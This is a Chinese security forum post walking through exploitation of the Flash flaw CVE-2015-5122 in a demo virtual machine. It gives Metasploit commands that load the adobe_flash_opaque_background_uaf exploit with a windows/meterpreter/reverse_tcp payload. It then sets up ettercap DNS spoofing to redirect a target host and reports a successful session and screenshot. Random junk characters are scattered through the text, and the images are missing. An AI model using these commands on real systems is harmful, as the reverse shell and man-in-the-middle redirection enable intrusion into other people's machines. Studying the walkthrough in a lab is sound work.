找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1356|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 L, e8 A8 i3 h! _7 N 二、cve2015-5122漏洞实例演示虚拟机 . A' W, [$ t( t- S0 S

; q2 Q5 i% F; u: A( V

. C) P" l2 G. _   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 0 V) R5 n- b! y. o

" J$ p4 p2 U! ]" j

9 Q2 k @6 b( p, Z search cve-2015-5122如图: 6 a1 q. v% U. P2 e# }

. c% I2 r0 d; i: `' q4 o

D: ?6 y/ p4 z4 K   - E- D& w4 B6 {8 q5 B9 A! t

& Q+ Y8 c4 E: k! X/ D

6 v( _3 R. N9 ~ f 下面我们敲如下命令: ' D+ M8 a' N: B9 R) K* I

3 P0 q( L# i" h M: _4 ]$ W; w

6 D% C" L4 r! n9 C ~, l( y$ }. C3 f use exploit/multi/browser/adobe_flash_opaque_background_uaf . _% S) V* W" z0 Z

8 X# x J& m3 T4 I% z! ]

" m8 k5 m) ~4 k- | set PAYLOAD windows/meterpreter/reverse_tcp * l# B* Q; O: D

~, R0 D# L) M* s* h% B& R* l3 C$ [, F

$ p. R$ D- q- ^ set LHOST 192.168.0.109 2 x5 W" U7 @! x* N- G& Q. M

1 E% ~, z3 T3 u- @- r9 Z: q

# e$ d* d+ u6 k( a# s/ r set URIPATH /                        /*根目录*/ 8 Q% G6 g3 L' N3 n0 T

1 O9 x3 D' M) o2 l' R- {. L( f

) e1 s+ b/ [, C9 c2 x: q set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 5 Y, j5 |9 n' @! N

0 J7 N; }- D, t* u& I, P

. N4 V4 H6 x9 H! B. e+ m9 \+ a set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 - `3 K0 R- [5 o2 V$ x" p

, h4 x, X3 O( s Q0 D

2 r8 k& d4 H7 {' Y3 Z 然后show options如图: ) U8 {- j5 h$ Y n

# {4 ?$ N* R% T8 n# G$ r

; T5 D/ o$ a4 e% i: N" ^/ S) U   % n4 X( ^) x8 s' ?) @

d- N* h9 f Z1 s) z( w8 g, d

8 d5 q" V" L: }" j' _ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
# \; E, P+ l' g! m( A
+ w. z c9 z+ D0 Y- w' O5 E

0 e- x7 s, s# B* I! N

! O8 A& s& i- ` 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 7 N7 T$ l- }6 H

1 ~9 A9 O4 J9 q8 Z- G+ H

# @. D/ D$ k$ ~0 G/ k Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf & c c' M8 Y. k* W) m

" x/ a- V. ~3 }- X8 m$ v- s, p; ]

; {, @- [4 @+ l$ ` g   ) H% t ^3 K! r0 ?5 `2 s* a/ H

# W2 m/ _* u% X* ]+ P% P5 x

+ h2 Z N, p# c+ Q 成功了,这时候我们断开ettercap,如图: 4 N; u) Z5 M2 Q9 `

. T. m4 M5 Z3 d) w

c! V: O& n" l   ! R1 D8 b9 _% q5 V5 L8 |7 R

, s0 c: ~4 G4 B

0 A% _. _! |2 F; c Screenshot如图: - t* w) Y4 k" Y' M8 l& I6 \0 v8 T% i

_7 ]( e5 T! w5 Q( V$ e/ s7 c

/ r; v/ W5 O: z* }! G   * q- Q; U# {- K% h' W( H

7 T8 R# S5 @$ M5 x( A

$ ?3 Z9 a' V2 Y3 T# B . O8 Q1 S* s; w: S* D: j

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表